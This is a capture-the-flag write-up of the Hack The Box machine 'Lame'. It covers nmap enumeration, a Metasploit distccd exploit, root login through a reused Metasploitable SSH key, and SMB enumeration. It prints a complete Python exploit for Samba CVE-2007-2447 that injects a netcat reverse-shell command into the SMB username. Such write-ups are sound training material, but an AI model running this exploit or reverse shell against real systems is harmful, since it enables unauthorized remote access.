Offensive Security
Offensive Security
About me / contact me
Penetration Testing with Kali
Note taking
Master your skills
OSCP
Information gathering
Gaining Access - Vulnerability Exploitation
Privilege Escalation
HTB
Active
Retired
10.10.10.9 - Bastard
10.10.10.3 - Lame - DistCC, SMB, SSH Reuse
10.10.10.4 - Legacy - WindowsXP samba
10.10.10.5 - Devel - Windows 7
10.10.10.7 - Beep - LFI, Shellshock, SUID
10.10.10.11 - Arctic - LFI, Win2008 Priv Esc
10.10.10.27 - Calamity - php command injection
10.10.10.46 - Apocalyst
10.10.10.51 - SOLID STATE - Apache James, SUID
10.10.10.63 - Jeeves - Jenkins WebServer, SeImpersonatePrivilege
10.10.10.84 - Poison - LFI (Log Poisoning)
VulnHub
Brainpan - 1 - Buffer Overflow
Web Vulnerabilities - OWASP TOP 10
SQL Injection
XXE - XML External Entity
Command Injection
Cross Site Scripting
Broken Authentication and Session Management
Insecure Direct Object References
Cross Site Request Forgery
Security Misconfiguration
Insecure Cryptographic Storage
Insufficient Transport Layer Protection
Other Web Vulnerabilities
Remote File Upload
Remote File Inclusion
Local File Inclusion
Personal Projects
WiFi Penetration Testing
Phishing attempts
News
Powered by GitBook

10.10.10.3 - Lame - DistCC, SMB, SSH Reuse

Metasploitable like VM - back to old school

Summary: vulnerable software : DistCCD; POC, Netbios-ssn; POC system vulnerable : 10.10.10.3 vulnerability explanation : privilege escalation: SSH keys reuse, SMB Service running as root. severity : critical

Enumeration:

[+] Running only TCP port scan
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:04 GMT
Nmap scan report for 10.10.10.3
Host is up (0.31s latency).
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: terminal|WAP|switch|specialized|general purpose|broadband router
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Chip PC embedded (92%), SNR embedded (90%), Crestron 2-Series (90%), Asus embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:snr:snr-s2960 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:asus:rt-ac66u cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Chip PC XtremePC thin client (92%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (90%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), SNR SNR-S2960 switch (90%), Crestron XPanel control system (90%), Linux 2.4.18 (90%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.68 seconds

Nmap has a script that can confirm the vulnerability in distccd:

└──╼ $nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:23 GMT
Nmap scan report for 10.10.10.3
Host is up (0.19s latency).
PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
|       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|_      http://http://www.osvdb.org/13378
Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds

Distccd exploitation:

msf5 exploit(unix/misc/distcc_exec) > search distcc
Matching Modules
================
   Name                           Disclosure Date  Rank       Check  Description
   ----                           ---------------  ----       -----  -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution
msf5 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)
Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target

Result:

Whilst browsing the root folder I found .ssh folder containing authorized_keys file with a familiar login name msfadmin:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

It made me think that this box was built upon popular pentesting VM - Metasploitable. I started this VM to compare the details and I have confirmed that kernel version is the same as well:

All I needed to do now, was to use metasploitable id_rsa keys to login as root without a password to Lame with a command:

ssh root@10.10.10.3 -i id_rsa

Share discovery on port 139:

└──╼ $smbmap -u "" -p "" -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                        
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	tmp                                               	READ, WRITE
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS
	ADMIN$                                            	NO ACCESS
└──╼ $enum4linux 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb  2 13:08:53 2019
 
 ======================================= 
|    Share Enumeration on 10.10.10.3    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Unable to initialize messaging context
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
	Server               Comment
	---------            -------
	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

Searchsploit Samba 3.0.20

Python version of Samba 3.0.20 < 3.0.25rc3 - 'Username' map script'

#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print '[+] Payload was sent - check netcat !'
if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

Exploit:

Result:

Previous
10.10.10.9 - Bastard
Next
10.10.10.4 - Legacy - WindowsXP samba
Last updated Fri Feb 15 2019 21:57:03 GMT+0000 (UTC)